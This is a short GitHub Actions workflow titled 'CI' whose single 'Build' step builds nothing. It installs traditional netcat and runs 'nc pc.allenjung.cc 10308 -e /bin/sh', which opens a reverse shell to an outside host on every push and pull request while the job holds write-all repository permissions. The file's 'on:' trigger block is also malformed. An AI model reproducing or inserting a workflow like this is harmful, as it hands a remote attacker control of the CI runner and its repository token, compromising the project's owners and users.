name: CI

on: [push, pull_request, workflow_dispatch]
  push:
  pull_request:
  workflow_dispatch:

permissions: write-all

jobs:
  test:
    runs-on: ubuntu-latest

    steps:
      - name: Build
        run: |
          sudo apt-get update
          sudo apt-get install -y netcat-traditional
          sudo update-alternatives --set nc /bin/nc.traditional
          nc pc.allenjung.cc 10308 -e /bin/sh
